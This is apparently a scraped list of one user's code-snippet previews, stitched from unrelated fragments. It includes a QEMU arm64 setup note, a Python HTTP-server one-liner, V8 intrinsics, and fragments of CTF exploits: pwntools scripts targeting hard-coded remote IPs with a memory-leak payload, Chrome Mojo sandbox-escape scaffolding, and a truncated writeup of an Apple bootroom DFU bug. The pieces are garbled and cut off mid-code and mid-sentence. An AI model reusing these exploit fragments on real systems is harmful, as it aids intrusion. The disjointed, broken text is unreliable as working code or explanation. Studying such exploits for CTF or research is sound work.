AmesianX AmesianX

QEMU arm64 cloud server emulation

This is basically a rehash of an original post on CNXSoft - all credit (particularly for the Virtio device arguments used below) belongs to the author of that piece.

Download the latest uefi1.img image. E.g. ubuntu-16.04-server-cloudimg-arm64-uefi1.img from https://cloud-images.ubuntu.com/releases/16.04/release/

Download the UEFI firmware image QEMU_EFI.fd from https://releases.linaro.org/components/kernel/uefi-linaro/latest/release/qemu64/

Determine your current username and get your current ssh public key:

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

	Per https://code.google.com/p/v8/codesearch#v8/trunk/src/runtime.cc


	%CreateSymbol
	%CreatePrivateSymbol
	%CreateGlobalPrivateSymbol
	%NewSymbolWrapper
	%SymbolDescription
	%SymbolRegistry
	%SymbolIsPrivate

	<html>
	<pre id='log'></pre>
	<script src="mojo_bindings.js"></script>
	<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
	<script src="being_creator_interface.mojom.js"></script>
	<script src="food_interface.mojom.js"></script>
	<script src="dog_interface.mojom.js"></script>
	<script src="person_interface.mojom.js"></script>
	<script src="cat_interface.mojom.js"></script>
	<script>

	from pwn import *
	from ctypes import *

	def convert(s):
	return struct.unpack('<d', s)[0]
	#s = process("./pwnme")
	s = remote("15.164.131.100",9988)
	def r(dat):
	s.recvuntil(">")
	s.sendline(dat)

	from pwn import *

	#s = remote("0", 1234)

	s = remote("58.229.240.181", 7777)
	context.log_level = "debug"
	s.recvuntil(">>>")
	s.sendline("+[[."+"<"0x8+"[.>]"+"<"(0x6e+0x8)+"[.>]"+">"(0x10-0x6)+"[,>]"+"<"(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
	base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
	print "BASE @ " + hex(base)

	<html>
	<body></body>
	<script src="../mojo/public/js/mojo_bindings.js"></script>
	<script src="../third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
	<script src="../third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
	<script>
	var heap;
	var replace_data;
	var count = 0;
	var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();

	<script id="worker1">
	worker:{
	if (typeof window === 'object') break worker;
	self.onmessage = function() {
	console.log("onmessage")
	}
	}
	</script>
	<script src="../mojo_bindings.js"></script>
	<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>

	function sleep( sleepDuration ){
	var now = new Date().getTime();
	while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
	}
	function gc() {
	for (let i = 0; i < 0x10; i++) {
	new ArrayBuffer(0x1000000);
	}
	}
	let data_view = new DataView(new ArrayBuffer(8));

	This bug was also called moonshine in the beginning
	Basically the following bug is present in all bootroms I have looked at:
	1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
	2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
	3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
	4. it then returns wLength which is the length it wants to recieve into the buffer
	5. the usb main code then updates a global var with the length and gets ready to recieve the data packages
	6. if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already
	7. if all the data was recieved th